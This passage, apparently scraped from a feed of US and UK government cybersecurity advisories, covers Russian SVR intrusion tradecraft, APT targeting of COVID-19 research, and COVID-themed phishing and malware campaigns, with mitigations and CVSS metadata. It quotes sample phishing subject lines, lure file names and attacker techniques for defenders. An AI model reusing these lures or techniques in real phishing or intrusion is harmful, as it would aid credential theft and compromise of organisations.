organization.\n\nWhile the password sprays were conducted from many different IP addresses, once the actors obtained access to an account, that compromised account was generally only accessed from a single IP address corresponding to a leased virtual private server (VPS). 
The FBI observed minimal overlap between the VPSs used for different compromised accounts, and each leased server used to conduct follow-on actions was in the same country as the victim organization.\n\nDuring the period of their access, the actors consistently logged into the administrative account to modify account permissions, including removing their access to accounts presumed to no longer be of interest, or adding permissions to additional accounts. \n\n#### _**Recommendations**_\n\nTo defend from this technique, the FBI and DHS recommend that network operators follow best practices for configuring access to cloud computing environments, including:\n\n * Mandatory use of an approved multi-factor authentication solution for all users from both on premises and remote locations.\n * Prohibit remote access to administrative functions and resources from IP addresses and systems not owned by the organization.\n * Regular audits of mailbox settings, account permissions, and mail forwarding rules for evidence of unauthorized changes.\n * Where possible, enforce the use of strong passwords and prevent the use of easily guessed or commonly used passwords through technical means, especially for administrative accounts.\n * Regularly review the organization\u2019s password management program.\n * Ensure the organization\u2019s information technology (IT) support team has well-documented standard operating procedures for password resets of user account lockouts.\n * Maintain a regular cadence of security awareness training for all company employees.\n\n### Leveraging Zero-Day Vulnerability\n\nIn a separate incident, SVR actors used CVE-2019-19781, a zero-day exploit at the time, against a virtual private network (VPN) appliance to obtain network access. 
Following exploitation of the device in a way that exposed user credentials, the actors identified and authenticated to systems on the network using the exposed credentials.\n\nThe actors worked to establish a foothold on several different systems that were not configured to require multi-factor authentication and attempted to access web-based resources in specific areas of the network in line with information of interest to a foreign intelligence service.\n\nFollowing initial discovery, the victim attempted to evict the actors. However, the victim had not identified the initial point of access, and the actors used the same VPN appliance vulnerability to regain access. Eventually, the initial access point was identified, removed from the network, and the actors were evicted. As in the previous case, the actors used dedicated VPSs located in the same country as the victim, probably to make it appear that the network traffic was not anomalous with normal activity.\n\n#### **_Recommendations_**\n\nTo defend from this technique, the FBI and DHS recommend network defenders ensure endpoint monitoring solutions are configured to identify evidence of lateral movement within the network and:\n\n * Monitor the network for evidence of encoded PowerShell commands and execution of network scanning tools, such as NMAP.\n * Ensure host based anti-virus/endpoint monitoring solutions are enabled and set to alert if monitoring or reporting is disabled, or if communication is lost with a host agent for more than a reasonable amount of time.\n * Require use of multi-factor authentication to access internal systems.\n * Immediately configure newly-added systems to the network, including those used for testing or development work, to follow the organization\u2019s security baseline and incorporate into enterprise monitoring tools.\n\n### WELLMESS Malware\n\nIn 2020, the governments of the United Kingdom, Canada, and the United States attributed intrusions perpetrated using malware known 
as WELLMESS to APT 29. WELLMESS was written in the Go programming language, and the previously-identified activity appeared to focus on targeting COVID-19 vaccine development. The FBI\u2019s investigation revealed that following initial compromise of a network\u2014normally through an unpatched, publicly-known vulnerability\u2014the actors deployed WELLMESS. Once on the network, the actors targeted each organization\u2019s vaccine research repository and Active Directory servers. These intrusions, which mostly relied on targeting on-premises network resources, were a departure from historic tradecraft, and likely indicate new ways the actors are evolving in the virtual environment. More information about the specifics of the malware used in this intrusion has been previously released and is referenced in the \u2018Resources\u2019 section of this document.\n\n### Tradecraft Similarities of SolarWinds-enabled Intrusions\n\nDuring the spring and summer of 2020, using modified SolarWinds network monitoring software as an initial intrusion vector, SVR cyber operators began to expand their access to numerous networks. The SVR\u2019s modification and use of trusted SolarWinds products as an intrusion vector is also a notable departure from the SVR\u2019s historic tradecraft.\n\nThe FBI\u2019s initial findings indicate similar post-infection tradecraft with other SVR-sponsored intrusions, including how the actors purchased and managed infrastructure used in the intrusions. After obtaining access to victim networks, SVR cyber actors moved through the networks to obtain access to e-mail accounts. Targeted accounts at multiple victim organizations included accounts associated with IT staff. 
The FBI suspects the actors monitored IT staff to collect useful information about the victim networks, determine if victims had detected the intrusions, and evade eviction actions.\n\n#### **_Recommendations_**\n\nAlthough defending a network from a compromise of trusted software is difficult, some organizations successfully detected and prevented follow-on exploitation activity from the initial malicious SolarWinds software. This was achieved using a variety of monitoring techniques including:\n\n * Auditing log files to identify attempts to access privileged certificates and creation of fake identity providers.\n * Deploying software to identify suspicious behavior on systems, including the execution of encoded PowerShell.\n * Deploying endpoint protection systems with the ability to monitor for behavioral indicators of compromise.\n * Using available public resources to identify credential abuse within cloud environments.\n * Configuring authentication mechanisms to confirm certain user activities on systems, including registering new devices.\n\nWhile few victim organizations were able to identify the initial access vector as SolarWinds software, some were able to correlate different alerts to identify unauthorized activity. The FBI and DHS believe those indicators, coupled with stronger network segmentation (particularly \u201czero trust\u201d architectures or limited trust between identity providers) and log correlation, can enable network defenders to identify suspicious activity requiring additional investigation.\n\n### General Tradecraft Observations\n\nSVR cyber operators are capable adversaries. In addition to the techniques described above, FBI investigations have revealed infrastructure used in the intrusions is frequently obtained using false identities and cryptocurrencies. VPS infrastructure is often procured from a network of VPS resellers. 
These false identities are usually supported by low reputation infrastructure including temporary e-mail accounts and temporary voice over internet protocol (VoIP) telephone numbers. While not exclusively used by SVR cyber actors, a number of SVR cyber personas use e-mail services hosted on cock[.]li or related domains.\n\nThe FBI also notes SVR cyber operators have used open source or commercially available tools continuously, including Mimikatz\u2014an open source credential-dumping tool\u2014and Cobalt Strike\u2014a commercially available exploitation tool.\n\n### Mitigations\n\nThe FBI and DHS recommend service providers strengthen their user validation and verification systems to prohibit misuse of their services.\n\n### Resources\n\n * NSA, CISA, FBI [Joint Cybersecurity Advisory: Russian SVR Targets U.S. and Allied Networks](<https://media.defense.gov/2021/Apr/15/2002621240/-1/-1/0/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF>)\n * CISA: [Remediating Networks Affected by the SolarWinds and Active Directory/M365 Compromise ](<https://us-cert.cisa.gov/remediating-apt-compromised-networks>)\n * CISA [Alert AA21-008A: Detecting Post-Compromise Threat Activity in Microsoft Cloud Environments](<https://us-cert.cisa.gov/ncas/alerts/aa21-008a>)\n * FBI, CISA, ODNI, NSA Joint Statement: [Joint Statement by the Federal Bureau of Investigation, the Cybersecurity and Infrastructure Security Agency, the Office of the Director of National Intelligence (ODNI), and the National Security Agency](<https://www.odni.gov/index.php/newsroom/press-releases/press-releases-2021/item/2176-joint-statement-by-the-federal-bureau-of-investigation-fbi-the-cybersecurity-and-infrastructure-security-agency-cisa-the-office-of-the-director-of-national-intelligence-odni-and-the-national-security-agency-nsa>)\n * CISA Alert [AA20-352A: Advanced Persistent Threat Compromise of Government Agencies, Critical Infrastructure, and Private Sector 
Organizations](<https://us-cert.cisa.gov/ncas/alerts/aa20-352a>)\n * [CISA Insights: What Every Leader Needs to Know about the Ongoing APT Cyber Activity](<https://www.cisa.gov/sites/default/files/publications/CISA Insights - What Every Leader Needs to Know About the Ongoing APT Cyber Activity - FINAL_508.pdf>)\n * FBI, CISA [Joint Cybersecurity Advisory: Advanced Persistent Threat Actors Targeting U.S. Think Tanks](<https://us-cert.cisa.gov/sites/default/files/publications/AA20-336A-APT_Actors_Targeting_US_ThinkTanks.pdf>)\n * CISA: [Malicious Activity Targeting COVID-19 Research, Vaccine Development ](<https://us-cert.cisa.gov/ncas/current-activity/2020/07/16/malicious-activity-targeting-covid-19-research-vaccine-development>)\n * NCSC, CSE, NSA, CISA Advisory: [APT 29 targets COVID-19 vaccine development](<https://media.defense.gov/2020/Jul/16/2002457639/-1/-1/0/NCSC_APT29_ADVISORY-QUAD-OFFICIAL-20200709-1810.PDF>)\n\n### Revisions\n\nApril 26, 2021: Initial Version\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-04-26T12:00:00", "type": "ics", "title": "Russian Foreign Intelligence Service (SVR) Cyber Operations: Trends and Best Practices for Network Defenders", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": 
"NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2021-04-26T12:00:00", "id": "AA21-116A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-116a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-03-14T18:35:54", "description": "### Summary\n\n**This is a joint alert from the United States Department of Homeland Security (DHS) Cybersecurity and Infrastructure Security Agency (CISA) and the United Kingdom\u2019s National Cyber Security Centre (NCSC).**\n\nCISA and NCSC continue to see indications that advanced persistent threat (APT) groups are exploiting the Coronavirus Disease 2019 (COVID-19) pandemic as part of their cyber operations. This joint alert highlights ongoing activity by APT groups against organizations involved in both national and international COVID-19 responses. It describes some of the methods these actors are using to target organizations and provides mitigation advice.\n\nThe joint CISA-NCSC [Alert: (AA20-099A) COVID-19 Exploited by Malicious Cyber Actors](<https://www.us-cert.gov/ncas/alerts/aa20-099a>) from April 8, 2020, previously detailed the exploitation of the COVID-19 pandemic by cybercriminals and APT groups. This joint CISA-NCSC Alert provides an update to ongoing malicious cyber activity relating to COVID-19. For a graphical summary of CISA\u2019s joint COVID-19 Alerts with NCSC, see the following [guide](<https://cisa.gov/sites/default/files/publications/Joint_CISA_UK_Tip-COVID-19_Cyber_Threat_Exploitation_S508C.pdf>).\n\n### COVID-19-related targeting\n\nAPT actors are actively targeting organizations involved in both national and international COVID-19 responses. 
These organizations include healthcare bodies, pharmaceutical companies, academia, medical research organizations, and local governments.\n\nAPT actors frequently target organizations in order to collect bulk personal information, intellectual property, and intelligence that aligns with national priorities.\n\nThe pandemic has likely raised additional interest for APT actors to gather information related to COVID-19. For example, actors may seek to obtain intelligence on national and international healthcare policy, or acquire sensitive data on COVID-19-related research.\n\n### Targeting of pharmaceutical and research organizations\n\nCISA and NCSC are currently investigating a number of incidents in which threat actors are targeting pharmaceutical companies, medical research organizations, and universities. APT groups frequently target such organizations in order to steal sensitive research data and intellectual property for commercial and state benefit. Organizations involved in COVID-19-related research are attractive targets for APT actors looking to obtain information for their domestic research efforts into COVID-19-related medicine.\n\nThese organizations\u2019 global reach and international supply chains increase exposure to malicious cyber actors. Actors view supply chains as a weak link that they can exploit to obtain access to better-protected targets. Many supply chain elements have also been affected by the shift to remote working and the new vulnerabilities that have resulted.\n\nRecently CISA and NCSC have seen APT actors scanning the external websites of targeted companies and looking for vulnerabilities in unpatched software. 
Actors are known to take advantage of Citrix vulnerability CVE-2019-19781[[1]](<https://www.us-cert.gov/ncas/alerts/aa20-031a>),[[2]](<https://www.ncsc.gov.uk/news/citrix-alert>) and vulnerabilities in virtual private network (VPN) products from Pulse Secure, Fortinet, and Palo Alto.[[3]](<https://www.us-cert.gov/ncas/alerts/aa20-010a>),[[4]](<https://www.ncsc.gov.uk/news/alert-vpn-vulnerabilities>)\n\n### COVID-19-related password spraying activity\n\nCISA and NCSC are actively investigating large-scale password spraying campaigns conducted by APT groups. These actors are using this type of attack to target healthcare entities in a number of countries\u2014including the United Kingdom and the United States\u2014as well as international healthcare organizations.\n\nPreviously, APT groups have used password spraying to target a range of organizations and companies across sectors\u2014including government, emergency services, law enforcement, academia and research organizations, financial institutions, and telecommunications and retail companies.\n\n### Technical Details\n\n[Password spraying](<https://www.ncsc.gov.uk/blog-post/spray-you-spray-me-defending-against-password-spraying-attacks>) is a commonly used style of brute force attack in which the attacker tries a single and commonly used password against many accounts before moving on to try a second password, and so on. This technique allows the attacker to remain undetected by avoiding rapid or frequent account lockouts. These attacks are successful because, for any given large set of users, there will likely be some with common passwords.\n\nMalicious cyber actors, including APT groups, collate names from various online sources that provide organizational details and use this information to identify possible accounts for targeted institutions. 
The actors will then \u201cspray\u201d the identified accounts with lists of commonly used passwords.\n\nOnce the malicious cyber actor compromises a single account, they will use it to access other accounts where the credentials are reused. Additionally, the actor could attempt to move laterally across the network to steal additional data and implement further attacks against other accounts within the network.\n\nIn previous incidents investigated by CISA and NCSC, malicious cyber actors used password spraying to compromise email accounts in an organization and then, in turn, used these accounts to download the victim organization\u2019s Global Address List (GAL). The actors then used the GAL to password spray further accounts.\n\nNCSC has previously provided [examples of frequently found passwords](<https://www.ncsc.gov.uk/blog-post/passwords-passwords-everywhere>), which attackers are known to use in password spray attacks to attempt to gain access to corporate accounts and networks. In these attacks, malicious cyber actors often use passwords based on the month of the year, seasons, and the name of the company or organization.\n\nCISA and NCSC continue to investigate activity linked to large-scale password spraying campaigns. APT actors will continue to exploit COVID-19 as they seek to answer additional intelligence questions relating to the pandemic. CISA and NCSC advise organizations to follow the mitigation advice below in view of this heightened activity.\n\n### Mitigations\n\nCISA and NCSC have previously published information for organizations on password spraying and improving password policy. 
Putting this into practice will significantly reduce the chance of compromise from this kind of attack.\n\n * [CISA alert on password spraying attacks](<https://www.us-cert.gov/ncas/alerts/TA18-086A>)\n * [CISA guidance on choosing and protecting passwords](<https://www.us-cert.gov/ncas/tips/ST04-002>)\n * [CISA guidance on supplementing passwords](<https://www.us-cert.gov/ncas/tips/ST05-012>)\n * [NCSC guidance on password spraying attacks](<https://www.ncsc.gov.uk/blog-post/spray-you-spray-me-defending-against-password-spraying-attacks>)\n * [NCSC guidance on password administration for system owners](<https://www.ncsc.gov.uk/collection/passwords>)\n * [NCSC guidance on password deny lists](<https://www.ncsc.gov.uk/blog-post/passwords-passwords-everywhere>)\n\nCISA\u2019s [Cyber Essentials](<https://www.cisa.gov/sites/default/files/publications/19_1106_cisa_CISA_Cyber_Essentials_S508C_0.pdf>) for small organizations provides guiding principles for leaders to develop a culture of security and specific actions for IT professionals to put that culture into action. Additionally, the UK government\u2019s [Cyber Aware](<https://www.ncsc.gov.uk/cyberaware/home>) campaign provides useful advice for individuals on how to stay secure online during the coronavirus pandemic. This includes advice on protecting passwords, accounts, and devices.\n\nA number of other mitigations will be of use in defending against the campaigns detailed in this report:\n\n * **Update VPNs, network infrastructure devices, and devices being used to remote into work environments with the latest software patches and configurations. **See CISA\u2019s [guidance on enterprise VPN security](<https://www.us-cert.gov/ncas/alerts/aa20-073a>) and NCSC [guidance on virtual private networks](<https://www.ncsc.gov.uk/collection/mobile-device-guidance/virtual-private-networks>) for more information.\n * **Use multi-factor authentication to reduce the impact of password compromises.** See the U.S. 
National Cybersecurity Awareness Month\u2019s [how-to guide for multi-factor authentication](<https://niccs.us-cert.gov/sites/default/files/documents/pdf/ncsam_howtoguidemfa_508.pdf?trackDocs=ncsam_howtoguidemfa_508.pdf>). Also see NCSC guidance on [multi-factor authentication services](<https://www.ncsc.gov.uk/guidance/multi-factor-authentication-online-services>) and [setting up two factor authentication](<https://www.ncsc.gov.uk/guidance/setting-two-factor-authentication-2fa>).\n * **Protect the management interfaces of your critical operational systems.** In particular, use browse-down architecture to prevent attackers easily gaining privileged access to your most vital assets. See [the NCSC blog on protecting management interfaces](<https://www.ncsc.gov.uk/blog-post/protect-your-management-interfaces>).\n * **Set up a security monitoring capability **so you are collecting the data that will be needed to analyze network intrusions. See the [NCSC introduction to logging security purposes](<https://www.ncsc.gov.uk/guidance/introduction-logging-security-purposes>).\n * **Review and refresh your incident management processes.** See [the NCSC guidance on incident management](<https://www.ncsc.gov.uk/guidance/10-steps-incident-management>).\n * **Use modern systems and software.** These have better security built in. If you cannot move off out-of-date platforms and applications straight away, there are short-term steps you can take to improve your position. See [the NCSC guidance on obsolete platform security](<https://www.ncsc.gov.uk/guidance/obsolete-platforms-security>).\n * **Further information: **Invest in preventing malware-based attacks across various scenarios. See CISA\u2019s guidance on [ransomware](<https://www.us-cert.gov/Ransomware>) and [protecting against malicious code](<https://www.us-cert.gov/ncas/tips/ST18-271>). 
Also see [the NCSC guidance on mitigating malware and ransomware attacks](<https://www.ncsc.gov.uk/guidance/mitigating-malware-and-ransomware-attacks>).\n\n### Contact Information\n\nCISA encourages U.S. users and organizations to contribute any additional information that may relate to this threat by emailing [CISAServiceDesk@cisa.dhs.gov](<mailto:CISAServiceDesk@cisa.dhs.gov>).\n\nThe NCSC encourages UK organizations to report any suspicious activity to the NCSC via their website: <https://report.ncsc.gov.uk/>.\n\n## Disclaimers\n\n_This report draws on information derived from CISA, NCSC, and industry sources. Any findings and recommendations made have not been provided with the intention of avoiding all risks and following the recommendations will not remove all such risk. Ownership of information risks remains with the relevant system owner at all times._\n\n_CISA does not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring by CISA._\n\n### References\n\n[[1] CISA Alert: Detecting Citrix CVE-2019-19781](<https://www.us-cert.gov/ncas/alerts/aa20-031a>)\n\n[[2] NCSC Alert: Actors exploiting Citrix products vulnerability](<https://www.ncsc.gov.uk/news/citrix-alert>)\n\n[[3] CISA Alert: Continued Exploitation of Pulse Secure VPN Vulnerability](<https://www.us-cert.gov/ncas/alerts/aa20-010a>)\n\n[[4] NCSC Alert: Vulnerabilities exploited in VPN products used worldwide](<https://www.ncsc.gov.uk/news/alert-vpn-vulnerabilities>)\n\n### Revisions\n\nMay 5, 2020: Initial Version\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": 
"NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-25T12:00:00", "type": "ics", "title": "APT Groups Target Healthcare and Essential Services", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2022-01-25T12:00:00", "id": "AA20-126A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-126a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-03-14T18:36:09", "description": "### Summary\n\n**This is a joint alert from the United States Department of Homeland Security (DHS) Cybersecurity and Infrastructure Security Agency (CISA) and the United Kingdom\u2019s National Cyber Security Centre (NCSC).**\n\nThis alert provides information on exploitation by cybercriminal and advanced persistent threat (APT) groups of the current coronavirus disease 2019 (COVID-19) global pandemic. It includes a non-exhaustive list of indicators of compromise (IOCs) for detection as well as mitigation advice.\n\nBoth CISA and NCSC are seeing a growing use of COVID-19-related themes by malicious cyber actors. 
At the same time, the surge in teleworking has increased the use of potentially vulnerable services, such as virtual private networks (VPNs), amplifying the threat to individuals and organizations.\n\nAPT groups and cybercriminals are targeting individuals, small and medium enterprises, and large organizations with COVID-19-related scams and phishing emails. This alert provides an overview of COVID-19-related malicious cyber activity and offers practical advice that individuals and organizations can follow to reduce the risk of being impacted. The IOCs provided within the accompanying .csv and .stix files of this alert are based on analysis from CISA, NCSC, and industry.\n\n**Note: **this is a fast-moving situation and this alert does not seek to catalogue all COVID-19-related malicious cyber activity. Individuals and organizations should remain alert to increased activity relating to COVID-19 and take proactive steps to protect themselves.\n\n### Technical Details\n\n## Summary of Attacks\n\nAPT groups are using the COVID-19 pandemic as part of their cyber operations. These cyber threat actors will often masquerade as trusted entities. Their activity includes using coronavirus-themed phishing messages or malicious applications, often masquerading as trusted entities that may have been previously compromised. Their goals and targets are consistent with long-standing priorities such as espionage and \u201chack-and-leak\u201d operations.\n\nCybercriminals are using the pandemic for commercial gain, deploying a variety of ransomware and other malware.\n\nBoth APT groups and cybercriminals are likely to continue to exploit the COVID-19 pandemic over the coming weeks and months. 
Threats observed include:\n\n * Phishing, using the subject of coronavirus or COVID-19 as a lure,\n * Malware distribution, using coronavirus- or COVID-19-themed lures,\n * Registration of new domain names containing wording related to coronavirus or COVID-19, and\n * Attacks against newly\u2014and often rapidly\u2014deployed remote access and teleworking infrastructure.\n\nMalicious cyber actors rely on basic social engineering methods to entice a user to carry out a specific action. These actors are taking advantage of human traits such as curiosity and concern around the coronavirus pandemic in order to persuade potential victims to:\n\n * Click on a link or download an app that may lead to a phishing website, or the downloading of malware, including ransomware. \n * For example, a malicious Android app purports to provide a real-time coronavirus outbreak tracker but instead attempts to trick the user into providing administrative access to install \"CovidLock\" ransomware on their device.[[1]](<https://www.techrepublic.com/article/covidlock-ransomware-exploits-coronavirus-with-malicious-android-app/>)\n * Open a file (such as an email attachment) that contains malware. \n * For example, email subject lines contain COVID-19-related phrases such as \u201cCoronavirus Update\u201d or \u201c2019-nCov: Coronavirus outbreak in your city (Emergency)\u201d\n\nTo create the impression of authenticity, malicious cyber actors may spoof sender information in an email to make it appear to come from a trustworthy source, such as the World Health Organization (WHO) or an individual with \u201cDr.\u201d in their title. In several examples, actors send phishing emails that contain links to a fake email login page. 
Other emails purport to be from an organization\u2019s human resources (HR) department and advise the employee to open the attachment.\n\nMalicious file attachments containing malware payloads may be named with coronavirus- or COVID-19-related themes, such as \u201cPresident discusses budget savings due to coronavirus with Cabinet.rtf.\u201d\n\n**Note: **a non-exhaustive list of IOCs related to this activity is provided within the accompanying .csv and .stix files of this alert.\n\n## Phishing\n\nCISA and NCSC have both observed a large volume of phishing campaigns that use the social engineering techniques described above.\n\nExamples of phishing email subject lines include:\n\n * 2020 Coronavirus Updates,\n * Coronavirus Updates,\n * 2019-nCov: New confirmed cases in your City, and\n * 2019-nCov: Coronavirus outbreak in your city (Emergency).\n\nThese emails contain a call to action, encouraging the victim to visit a website that malicious cyber actors use for stealing valuable data, such as usernames and passwords, credit card information, and other personal information.\n\n## SMS Phishing\n\nMost phishing attempts come by email but NCSC has observed some attempts to carry out phishing by other means, including text messages (SMS).\n\nHistorically, SMS phishing has often used financial incentives\u2014including government payments and rebates (such as a tax rebate)\u2014as part of the lure. Coronavirus-related phishing continues this financial theme, particularly in light of the economic impact of the epidemic and governments\u2019 employment and financial support packages. For example, a series of SMS messages uses a UK government-themed lure to harvest email, address, name, and banking information. 
These SMS messages\u2014purporting to be from \u201cCOVID\u201d and \u201cUKGOV\u201d (see figure 1)\u2014include a link directly to the phishing site (see figure 2).\n\n\n\n##### Figure 1: UK government-themed SMS phishing\n\n\n\n##### Figure 2: UK government-themed phishing page\n\nAs this example demonstrates, malicious messages can arrive by methods other than email. In addition to SMS, possible channels include WhatsApp and other messaging services. Malicious cyber actors are likely to continue using financial themes in their phishing campaigns. Specifically, it is likely that they will use new government aid packages responding to COVID-19 as themes in phishing campaigns.\n\n## Phishing for credential theft\n\nA number of actors have used COVID-19-related phishing to steal user credentials. These emails include previously mentioned COVID-19 social engineering techniques, sometimes complemented with urgent language to enhance the lure.\n\nIf the user clicks on the hyperlink, a spoofed login webpage appears that includes a password entry form. These spoofed login pages may relate to a wide array of online services including\u2014but not limited to\u2014email services provided by Google or Microsoft, or services accessed via government websites.\n\nTo further entice the recipient, the websites will often contain COVID-19-related wording within the URL (e.g., \u201ccorona-virus-business-update,\u201d \u201ccovid19-advisory,\u201d or \u201ccov19esupport\u201d). These spoofed pages are designed to look legitimate or accurately impersonate well-known websites. Often the only way to notice malicious intent is through examining the website URL. In some circumstances, malicious cyber actors specifically customize these spoofed login webpages for the intended victim.\n\nIf the victim enters their password on the spoofed page, the attackers will be able to access the victim\u2019s online accounts, such as their email inbox. 
This access can then be used to acquire personal or sensitive information, or to further disseminate phishing emails, using the victim\u2019s address book.\n\n## Phishing for malware deployment\n\nA number of threat actors have used COVID-19-related lures to deploy malware. In most cases, actors craft an email that persuades the victim to open an attachment or download a malicious file from a linked website. When the victim opens the attachment, the malware is executed, compromising the victim\u2019s device.\n\nFor example, NCSC has observed various email messages that deploy the \u201cAgent Tesla\u201d keylogger malware. The email appears to be sent from Dr. Tedros Adhanom Ghebreyesus, Director-General of WHO. This email campaign began on Thursday, March 19, 2020. Another similar campaign offers thermometers and face masks to fight the epidemic. The email purports to attach images of these medical products but instead contains a loader for Agent Tesla.\n\nIn other campaigns, emails include a Microsoft Excel attachment (e.g., \u201c8651 8-14-18.xls\u201d) or contain URLs linking to a landing page that contains a button that\u2014if clicked\u2014redirects to download an Excel spreadsheet, such as \"EMR Letter.xls\u201d. In both cases, the Excel file contains macros that, if enabled, execute an embedded dynamic-link library (DLL) to install the \u201cGet2 loader\" malware. Get2 loader has been observed loading the \u201cGraceWire\u201d Trojan.\n\nThe \"TrickBot\" malware has been used in a variety of COVID-19-related campaigns. In one example, emails target Italian users with a document purporting to be information related to COVID-19 (see figure 3). 
The document contains a malicious macro that downloads a batch file (BAT), which launches JavaScript, which\u2014in turn\u2014pulls down the TrickBot binary, executing it on the system.\n\n\n\n##### Figure 3: Email containing malicious macro targeting Italian users[[2]](<https://www.bleepingcomputer.com/news/security/trickbot-malware-targets-italy-in-fake-who-coronavirus-emails/>)\n\nIn many cases, Trojans\u2014such as Trickbot or GraceWire\u2014will download further malicious files, such as Remote Access Trojans (RATs), desktop-sharing clients, and ransomware. In order to maximize the likelihood of payment, cybercriminals will often deploy ransomware at a time when organizations are under increased pressure. Hospitals and health organizations in the United States,[[3]](<https://securityboulevard.com/2020/03/maze-ransomware-continues-to-hit-healthcare-units-amid-coronavirus-covid-19-outbreak/>) Spain,[[4]](<https://www.computing.co.uk/news/4012969/hospitals-coronavirus-ransomware>) and across Europe[[5]](<https://www.bleepingcomputer.com/news/security/covid-19-testing-center-hit-by-cyberattack/>) have all been recently affected by ransomware incidents.\n\nAs always, individuals and organizations should be on the lookout for new and evolving lures. Both CISA[[6]](<https://www.us-cert.gov/ncas/tips/ST18-271>),[[7]](<https://www.us-cert.gov/Ransomware>) and NCSC[[8]](<https://www.ncsc.gov.uk/guidance/mitigating-malware-and-ransomware-attacks>) provide guidance on mitigating malware and ransomware attacks.\n\n## Exploitation of new teleworking infrastructure\n\nMany organizations have rapidly deployed new networks, including VPNs and related IT infrastructure, to shift their entire workforce to teleworking.\n\nMalicious cyber actors are taking advantage of this mass move to telework by exploiting a variety of publicly known vulnerabilities in VPNs and other remote working tools and software. 
In several examples, CISA and NCSC have observed actors scanning for publicly known vulnerabilities in Citrix. Citrix vulnerability, CVE-2019-19781, and its exploitation have been widely reported since early January 2020. Both CISA[[9]](<https://www.us-cert.gov/ncas/alerts/aa20-031a>) and NCSC[[10]](<https://www.ncsc.gov.uk/news/citrix-alert>) provide guidance on CVE-2019-19781 and continue to investigate multiple instances of this vulnerability's exploitation.\n\nSimilarly, known vulnerabilities affecting VPN products from Pulse Secure, Fortinet, and Palo Alto continue to be exploited. CISA provides guidance on the Pulse Secure vulnerability[[11]](<https://www.us-cert.gov/ncas/alerts/aa20-010a>) and NCSC provides guidance on the vulnerabilities in Pulse Secure, Fortinet, and Palo Alto.[[12]](<https://www.ncsc.gov.uk/news/alert-vpn-vulnerabilities>)\n\nMalicious cyber actors are also seeking to exploit the increased use of popular communications platforms\u2014such as Zoom or Microsoft Teams\u2014by sending phishing emails that include malicious files with names such as \u201czoom-us-zoom_##########.exe\u201d and \u201cmicrosoft-teams_V#mu#D_##########.exe\u201d (# representing various digits that have been reported online).[[13]](<https://blog.checkpoint.com/2020/03/30/covid-19-impact-cyber-criminals-target-zoom-domains/>) CISA and NCSC have also observed phishing websites for popular communications platforms. In addition, attackers have been able to hijack teleconferences and online classrooms that have been set up without security controls (e.g., passwords) or with unpatched versions of the communications platform software.[[14]](<https://www.fbi.gov/contact-us/field-offices/boston/news/press-releases/fbi-warns-of-teleconferencing-and-online-classroom-hijacking-during-covid-19-pandemic>)\n\nThe surge in teleworking has also led to an increase in the use of Microsoft\u2019s Remote Desktop Protocol (RDP). 
Attacks on unsecured RDP endpoints (i.e., exposed to the internet) are widely reported online,[[15]](<https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/>) and recent analysis[[16]](<https://blog.reposify.com/127-increase-in-exposed-rdps-due-to-surge-in-remote-work>) has identified a 127% increase in exposed RDP endpoints. The increase in RDP use could potentially make IT systems\u2014without the right security measures in place\u2014more vulnerable to attack.[[17]](<https://www.us-cert.gov/ncas/tips/ST18-001>)\n\n## Indicators of compromise\n\nCISA and NCSC are working with law enforcement and industry partners to disrupt or prevent these malicious cyber activities and have published a non-exhaustive list of COVID-19-related IOCs via the following links:\n\n * [AA20-099A_WHITE.csv](<https://www.us-cert.gov/sites/default/files/publications/AA20-099A_WHITE.csv>)\n * [AA20-099A_WHITE.stix](<https://www.us-cert.gov/sites/default/files/publications/AA20-099A_WHITE.stix.xml>)\n\nIn addition, there are a number of useful publicly available resources that provide details of COVID-19-related malicious cyber activity:\n\n * Recorded Future\u2019s report, [_Capitalizing on Coronavirus Panic, Threat Actors Target Victims Worldwide_](<https://go.recordedfuture.com/hubfs/reports/cta-2020-0312-2.pdf>)\n * DomainTools\u2019 [_Free COVID-19 Threat List - Domain Risk Assessments for Coronavirus 